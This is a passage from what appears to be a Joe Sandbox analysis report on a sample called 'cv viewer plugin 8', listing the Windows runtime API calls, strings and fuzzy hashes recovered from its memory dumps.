                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 016A34D7
                                                    • RtlEnterCriticalSection.NTDLL(00000018), ref: 016A34ED
                                                    • RtlLeaveCriticalSection.NTDLL(00000018), ref: 016A3518
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                    • String ID: CancelIoEx$KERNEL32
                                                    • API String ID: 2902213904-434325024
                                                    • Opcode ID: 741688652d15457712ba45749a05aa9b2d37dce14df8fb608511035fb1e231a4
                                                    • Instruction ID: 045de62dbf7660c56f094d6308fdfacdd15106cb2b5b2f70dba7d1219297b15c
                                                    • Opcode Fuzzy Hash: 741688652d15457712ba45749a05aa9b2d37dce14df8fb608511035fb1e231a4
                                                    • Instruction Fuzzy Hash: EC31ADB9A00316DFDB11AF68CC84AAA7BF8FF58310F0084A9E9159B341C770D901CFA1
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404381,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 0040658A
                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065A2
                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065B3
                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004065C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                    • API String ID: 2238633743-4044615076
                                                    • Opcode ID: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                    • Instruction ID: 34c45dea863b0ad37b671b2ee6745cf1fa65c172ae9c71c573f5c1b511995102
                                                    • Opcode Fuzzy Hash: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                    • Instruction Fuzzy Hash: FA017571A40201FFCB209FB5BFC492B3AE99B58690306193FB541F2291DE79C815DB68
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406899
                                                    • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004068B5
                                                    • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00406317,?,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 004068FE
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406936
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 0040698E
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406317,00200020,00000000,?,00000000), ref: 004069A4
                                                    • LCMapStringW.KERNEL32(00000000,?,00406317,00000000,00406317,?,?,00406317,00200020,00000000,?,00000000), ref: 004069D7
                                                    • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 00406A3F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 352835431-0
                                                    • Opcode ID: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                    • Instruction ID: 8dbeb6cb8c932cbdef2775d2a29e2de0fc7c35b208bd80b0a47b5516e3ba15ce
                                                    • Opcode Fuzzy Hash: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                    • Instruction Fuzzy Hash: 3E518A71500209EBCF219F94CD45AAF7BB5FB49714F12413AF912B12A0C73A8C21DB69
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 004042CA
                                                    • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004043A0
                                                    • WriteFile.KERNEL32(00000000), ref: 004043A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: File$HandleModuleNameWrite
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                    • API String ID: 3784150691-4022980321
                                                    • Opcode ID: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                    • Instruction ID: ad501088bf1d437e3d5a217a77e101a13ac7783d72fc0021c8d9dd27a33d1b06
                                                    • Opcode Fuzzy Hash: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                    • Instruction Fuzzy Hash: 52318772600218AFDF2096608E45FDA736DAF85304F1004BFF944B61D1EA789D458A5D
                                                    APIs
                                                    • OpenEventA.KERNEL32(00100002,00000000,00000000,DA1F4857), ref: 016B16B0
                                                    • CloseHandle.KERNEL32(00000000), ref: 016B16C5
                                                    • ResetEvent.KERNEL32(00000000,DA1F4857), ref: 016B16CF
                                                    • CloseHandle.KERNEL32(00000000,DA1F4857), ref: 016B1704
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,DA1F4857), ref: 016B177A
                                                    • CloseHandle.KERNEL32(00000000), ref: 016B178F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEventHandle$CreateOpenReset
                                                    • String ID:
                                                    • API String ID: 1285874450-0
                                                    • Opcode ID: 782ec95f60872cc086625df3d7e14a34ddbb963f9af52814729644845f07163e
                                                    • Instruction ID: f00d57ab3b2a9fcaba09d9a97696535fabf71df02a485649f1168006c867bc81
                                                    • Opcode Fuzzy Hash: 782ec95f60872cc086625df3d7e14a34ddbb963f9af52814729644845f07163e
                                                    • Instruction Fuzzy Hash: 0B414E70D00359AFDF21CFA9DC98BEDBBB8AB06760F144229E919EB381D7309945CB50
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A20AC
                                                    • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 016A20CD
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016A20D8
                                                    • InterlockedDecrement.KERNEL32(?), ref: 016A213E
                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 016A217A
                                                    • InterlockedDecrement.KERNEL32(?), ref: 016A2187
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016A21A6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                    • String ID:
                                                    • API String ID: 1171374749-0
                                                    • Opcode ID: 87460f2d7b42acdf736444f652999663e05b20550d8de50a9d94716c4c4ed9e1
                                                    • Instruction ID: cb8390a0346137c73eb43b9f6db1348b4342baaff9271fbd2e34dde52e666521
                                                    • Opcode Fuzzy Hash: 87460f2d7b42acdf736444f652999663e05b20550d8de50a9d94716c4c4ed9e1
                                                    • Instruction Fuzzy Hash: 974116B56447019FC321DF2ADC8496BBBF9FBD8651F404A1EA59682250DB30E906CFA2
                                                    APIs
                                                      • Part of subcall function 016B1ED0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,016B172E,?,?), ref: 016B1EFF
                                                      • Part of subcall function 016B1ED0: CloseHandle.KERNEL32(00000000,?,?,016B172E,?,?), ref: 016B1F14
                                                      • Part of subcall function 016B1ED0: SetEvent.KERNEL32(00000000,016B172E,?,?), ref: 016B1F27
                                                    • OpenEventA.KERNEL32(00100002,00000000,00000000,DA1F4857), ref: 016B16B0
                                                    • CloseHandle.KERNEL32(00000000), ref: 016B16C5
                                                    • ResetEvent.KERNEL32(00000000,DA1F4857), ref: 016B16CF
                                                    • CloseHandle.KERNEL32(00000000,DA1F4857), ref: 016B1704
                                                    • __CxxThrowException@8.LIBCMT ref: 016B1735
                                                      • Part of subcall function 016B455A: RaiseException.KERNEL32(?,?,016AFB5F,?,?,?,?,?,?,?,016AFB5F,?,016D0FA8,?), ref: 016B45AF
                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,DA1F4857), ref: 016B177A
                                                    • CloseHandle.KERNEL32(00000000), ref: 016B178F
                                                      • Part of subcall function 016B1C10: GetCurrentProcessId.KERNEL32(?), ref: 016B1C69
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,DA1F4857), ref: 016B179F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                    • String ID:
                                                    • API String ID: 2227236058-0
                                                    • Opcode ID: 1fd07d1e9e22f98908d837ad31c11416bc8ed355d314acfc3760e02372b3301d
                                                    • Instruction ID: 735e5df1d507c2d09fc4f8ff6b768a1d0a605cfb27ab7e510e5140ea6a07b40d
                                                    • Opcode Fuzzy Hash: 1fd07d1e9e22f98908d837ad31c11416bc8ed355d314acfc3760e02372b3301d
                                                    • Instruction Fuzzy Hash: 00315371D00319BBEF21CBA8ECA4BEDB7B9AF06350F140129E919E7381E7209995CB51
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 016B5D94
                                                      • Part of subcall function 016B8503: RtlEncodePointer.NTDLL(00000000), ref: 016B8506
                                                      • Part of subcall function 016B8503: __initp_misc_winsig.LIBCMT ref: 016B8521
                                                      • Part of subcall function 016B8503: GetModuleHandleW.KERNEL32(kernel32.dll,?,016D15A8,00000008,00000003,016D0F8C,?,00000001), ref: 016B9281
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 016B9295
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 016B92A8
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 016B92BB
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 016B92CE
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 016B92E1
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 016B92F4
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 016B9307
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 016B931A
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 016B932D
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 016B9340
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 016B9353
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 016B9366
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 016B9379
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 016B938C
                                                      • Part of subcall function 016B8503: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 016B939F
                                                    • __mtinitlocks.LIBCMT ref: 016B5D99
                                                    • __mtterm.LIBCMT ref: 016B5DA2
                                                      • Part of subcall function 016B5E0A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 016B8939
                                                      • Part of subcall function 016B5E0A: _free.LIBCMT ref: 016B8940
                                                      • Part of subcall function 016B5E0A: RtlDeleteCriticalSection.NTDLL(016D3978), ref: 016B8962
                                                    • __calloc_crt.LIBCMT ref: 016B5DC7
                                                    • __initptd.LIBCMT ref: 016B5DE9
                                                    • GetCurrentThreadId.KERNEL32 ref: 016B5DF0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 3567560977-0
                                                    • Opcode ID: d1e84f389531e97eea149aef407818b9ce4f4e3328cf6f143466a982c2b34685
                                                    • Instruction ID: ccabb8b77155c279011ca3e2dd524b604b5eab805296b8b74b454ff329106852
                                                    • Opcode Fuzzy Hash: d1e84f389531e97eea149aef407818b9ce4f4e3328cf6f143466a982c2b34685
                                                    • Instruction Fuzzy Hash: 2BF0F0325293131EE6787B397CCA6DB2B8A9B11630B24431EE622D61C8FF1188C25388
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,016B3473,00000000), ref: 016B34DB
                                                    • GetProcAddress.KERNEL32(00000000), ref: 016B34E2
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 016B34EE
                                                    • RtlDecodePointer.NTDLL(00000001), ref: 016B350B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: 746abb1109432056cc9143d3c1b123e51bae530f2c80623e86dee58c49ccfe86
                                                    • Instruction ID: c2cbf63e340342d9327221dfa05384096130442dcf1273b514fb4b0689eb946f
                                                    • Opcode Fuzzy Hash: 746abb1109432056cc9143d3c1b123e51bae530f2c80623e86dee58c49ccfe86
                                                    • Instruction Fuzzy Hash: 1CE01AB0A91350AEDB305F75ED49B763B69F750B06F806028F406D1288CBB55268CF10
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,016B34B0), ref: 016B35B0
                                                    • GetProcAddress.KERNEL32(00000000), ref: 016B35B7
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 016B35C2
                                                    • RtlDecodePointer.NTDLL(016B34B0), ref: 016B35DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 360d700aa20f0c75044e2dab52d964b7331b98567022ec250cb6eac5a188adf1
                                                    • Instruction ID: 9caab7bc678b9f3bc58d1b47a31d71f8bb22ff193cbe11bd9c7373d49e5618b2
                                                    • Opcode Fuzzy Hash: 360d700aa20f0c75044e2dab52d964b7331b98567022ec250cb6eac5a188adf1
                                                    • Instruction Fuzzy Hash: 08E0BFB0A91304AFDB705FA5EE0DB653A79F751702F146418F102D165CDBB452A0CF50
                                                    APIs
                                                    • TlsGetValue.KERNEL32(00000029,DA1F4857,?,?,?,?,00000000,016C6AB8,000000FF,016B21CA), ref: 016B1F6A
                                                    • TlsSetValue.KERNEL32(00000029,016B21CA,?,?,00000000), ref: 016B1FD7
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 016B2001
                                                    • HeapFree.KERNEL32(00000000), ref: 016B2004
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HeapValue$FreeProcess
                                                    • String ID:
                                                    • API String ID: 1812714009-0
                                                    • Opcode ID: 4daa0b721ecfc29156f569ca3da6469721eb6bd0e1365d757e2eedad4f7c9883
                                                    • Instruction ID: 0fe3f44f4f93aa094b0078af17dcf4c9b31dff9a6571700f30e880c5ce94ee50
                                                    • Opcode Fuzzy Hash: 4daa0b721ecfc29156f569ca3da6469721eb6bd0e1365d757e2eedad4f7c9883
                                                    • Instruction Fuzzy Hash: 5651DE75A043089FD720CF2DDC98BA67BE6FB49760F09865CE81987381C731AC80CB91
                                                    APIs
                                                    • _ValidateScopeTableHandlers.LIBCMT ref: 016C5790
                                                    • __FindPESection.LIBCMT ref: 016C57AA
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindHandlersScopeSectionTableValidate
                                                    • String ID:
                                                    • API String ID: 876702719-0
                                                    • Opcode ID: d5a92f98ed8a9f42b0b174dcb8a879934c3a0121dd7ac600f9be853dd89d3a25
                                                    • Instruction ID: e8c581ada3294a0536f6cd737346f29fad483dcecc15aeda996308d56759a7e8
                                                    • Opcode Fuzzy Hash: d5a92f98ed8a9f42b0b174dcb8a879934c3a0121dd7ac600f9be853dd89d3a25
                                                    • Instruction Fuzzy Hash: 7BA1BE71F017658FDB21CF19DC80ABABBA5EB48A25F15426DDD06AB351E730F841CB90
                                                    APIs
                                                    • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040674D
                                                    • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 00406767
                                                    • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040679B
                                                    • MultiByteToWideChar.KERNEL32(00406317,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004067D3
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406829
                                                    • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040683B
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: StringType$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 3852931651-0
                                                    • Opcode ID: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                    • Instruction ID: 7abba187aa9a424c0dbe6a0d425d95b5373609879485ba3de4d3a8f21a169ece
                                                    • Opcode Fuzzy Hash: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                    • Instruction Fuzzy Hash: 11418D72901209EFCF209F94CD85EAF3B79FB04754F11453AF912F2290D73989608B99
                                                    APIs
                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 016A1CB1
                                                    • CloseHandle.KERNEL32(?), ref: 016A1CBA
                                                    • InterlockedExchangeAdd.KERNEL32(016D727C,00000000), ref: 016A1CC6
                                                    • TerminateThread.KERNEL32(?,00000000), ref: 016A1CD4
                                                    • QueueUserAPC.KERNEL32(016A1E7C,?,00000000), ref: 016A1CE1
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 016A1CEC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                    • String ID:
                                                    • API String ID: 1946104331-0
                                                    • Opcode ID: 6074dc9f0ec9f917f858229c44cc49a82c3b9e9f748a10ba5f124a38d992c72b
                                                    • Instruction ID: 38aa5546af62fdd4d85fad54ceebda19b4eb4abeb4fd1bbb9fce4cffb51bee3d
                                                    • Opcode Fuzzy Hash: 6074dc9f0ec9f917f858229c44cc49a82c3b9e9f748a10ba5f124a38d992c72b
                                                    • Instruction Fuzzy Hash: CDF04475600214BFD7205B96ED0DD67BFBCEB45721B00425DF56AC2190DB706910CF61
                                                    APIs
                                                      • Part of subcall function 016A9AD9: __EH_prolog.LIBCMT ref: 016A9ADE
                                                      • Part of subcall function 016A9AD9: _Allocate.LIBCPMT ref: 016A9B35
                                                      • Part of subcall function 016A9AD9: _memmove.LIBCMT ref: 016A9B8C
                                                    • _memset.LIBCMT ref: 016B0939
                                                    • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 016B09A2
                                                    • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 016B09AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                    • String ID: Unknown error$invalid string position
                                                    • API String ID: 1854462395-1837348584
                                                    • Opcode ID: 2dd3e438d4b58f9bf53182f9c504f1278e8fdebe9c3e256a9b00ed02b7e16e74
                                                    • Instruction ID: af836fa18a1a546ea4f93057a0d0ff358fb8027c0216da4f08689f235da5dbfb
                                                    • Opcode Fuzzy Hash: 2dd3e438d4b58f9bf53182f9c504f1278e8fdebe9c3e256a9b00ed02b7e16e74
                                                    • Instruction Fuzzy Hash: 98518A702083419FE714DF28CC90B6FBBF4AB98744F500A2DF89297692D771E588CB56
                                                    APIs
                                                    • GetVersionExA.KERNEL32 ref: 00403ECB
                                                    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F00
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403F60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentFileModuleNameVariableVersion
                                                    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                    • API String ID: 1385375860-4131005785
                                                    • Opcode ID: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                    • Instruction ID: b9728f854654bad712525c43123df79641ae2587965f18a3091eb02ea7af310c
                                                    • Opcode Fuzzy Hash: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                    • Instruction Fuzzy Hash: 42312771D002896DEB319A309C45BDA7F7C9B12309F2400FBE545F52C2D6398F8A8718
                                                    APIs
                                                    • std::exception::exception.LIBCMT ref: 016B197F
                                                      • Part of subcall function 016B24D3: std::exception::_Copy_str.LIBCMT ref: 016B24EC
                                                      • Part of subcall function 016B0D50: __CxxThrowException@8.LIBCMT ref: 016B0DAE
                                                    • std::exception::exception.LIBCMT ref: 016B19DE
                                                    Strings
                                                    • boost unique_lock has no mutex, xrefs: 016B196E
                                                    • $, xrefs: 016B19E3
                                                    • boost unique_lock owns already the mutex, xrefs: 016B19CD
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                    • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                    • API String ID: 2140441600-46888669
                                                    • Opcode ID: 56f29edd18bf4b4b07778ba6e8c13f5f407dc4913a394978f9328c2992c26603
                                                    • Instruction ID: 5183da78a09eb7db0b049d9a6b28c829ceb16f93059f253fadc95425e3638f19
                                                    • Opcode Fuzzy Hash: 56f29edd18bf4b4b07778ba6e8c13f5f407dc4913a394978f9328c2992c26603
                                                    • Instruction Fuzzy Hash: 642126B14083819FD720DF24C89479BBBE9BB99B08F004A1DF4A587380D7B9E448CB86
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 016B4A80
                                                      • Part of subcall function 016B5C72: GetLastError.KERNEL32(00000000,?,016B5E60,016B3033,00000000,?,016B8ACB,?,?,?,00000000,?,016B89B8,00000018,016D16F8,00000008), ref: 016B5C74
                                                      • Part of subcall function 016B5C72: __calloc_crt.LIBCMT ref: 016B5C95
                                                      • Part of subcall function 016B5C72: __initptd.LIBCMT ref: 016B5CB7
                                                      • Part of subcall function 016B5C72: GetCurrentThreadId.KERNEL32 ref: 016B5CBE
                                                      • Part of subcall function 016B5C72: SetLastError.KERNEL32(00000000,016B8ACB,?,?,?,00000000,?,016B89B8,00000018,016D16F8,00000008,016B8905,?,?,?,016B5B88), ref: 016B5CD6
                                                    • __calloc_crt.LIBCMT ref: 016B4AA3
                                                    • __get_sys_err_msg.LIBCMT ref: 016B4AC1
                                                    • __invoke_watson.LIBCMT ref: 016B4ADE
                                                    Strings
                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 016B4A8B, 016B4AB1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                    • API String ID: 109275364-798102604
                                                    • Opcode ID: 29492d0f99114663b1cc24eab4c5176bb6a2289f54992e8045a145b75a4aca54
                                                    • Instruction ID: d2761e60e9a561ba0760375835d442befac394dd5dfaf74ffccdbbe38afb36f4
